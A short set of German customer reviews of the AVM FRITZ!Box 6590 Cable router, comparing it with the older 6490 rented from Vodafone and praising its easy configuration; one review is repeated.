    Warum habe ich mir die fritzbox 6590 cable gekauft und nicht die 6490 cable?. Ein punkt ist, dass die 6590 aktueller vom entwicklungsstand ist (schnelleres wlan, schnellere update- und downloads und schnelleren prozessor und wie ich finde endlich ein besseres geräte design. Ein weiterer punkt war die Überlegung, dass diese box für die nächsten jahre bei mir zu hause ihren dienst verrichten soll. Webhalb ich dann das aktuellste modell genommen habe. Was mir außerdem immer wieder aufgefallen ist, war bei der 6490 die erhebliche wärmeentwickkung. Das ist bei der 6590 nicht mehr der fall. Klar hätte ich auch mit der 6490 weiter glücklich werden können. Diese hatte ich fast zwei jahre über vodafone zu miete. Jetzt bekommt der router aber seit mehreren monaten keine software updates mehr von vodafone und steht immer noch auf software version 6. Aktuell veröffentlicht durch avm ist version 6. 85eigenständige software updates kann man als nutzer einer fritzbox 6490 von vodafone nicht machen. Also stand mein entschluss fest. 6490 bei vodafone kündigen. Und eine neue fritzbox bei amazon kaufen.
    1. Funktioniert super und hat bei uns modem und router ersetzt – weniger geräte, weniger arbeit. Konfiguration ist sehr einfach, die benutzeroberfläche sehr verständlich. Ich hab nurn noch nciht rausgefunden, ob das gerät auch dann noch verwendbar wäre, wenn wir mal nicht kabelkunde sind und einen normalen dsl-anschluss hätten.
  23. Rezension bezieht sich auf : AVM FRITZ!Box 6590 Cable WLAN AC + N Router (DOCSIS-3.0-Kabelmodem, Dual-WLAN AC+N mit 1.733 Mbit/s (5 GHz) + 800 MBit/s (2,4 GHz), VoIP-Telefonanlage)

    Funktioniert super und hat bei uns modem und router ersetzt – weniger geräte, weniger arbeit. Konfiguration ist sehr einfach, die benutzeroberfläche sehr verständlich. Ich hab nurn noch nciht rausgefunden, ob das gerät auch dann noch verwendbar wäre, wenn wir mal nicht kabelkunde sind und einen normalen dsl-anschluss hätten.

Comments are closed.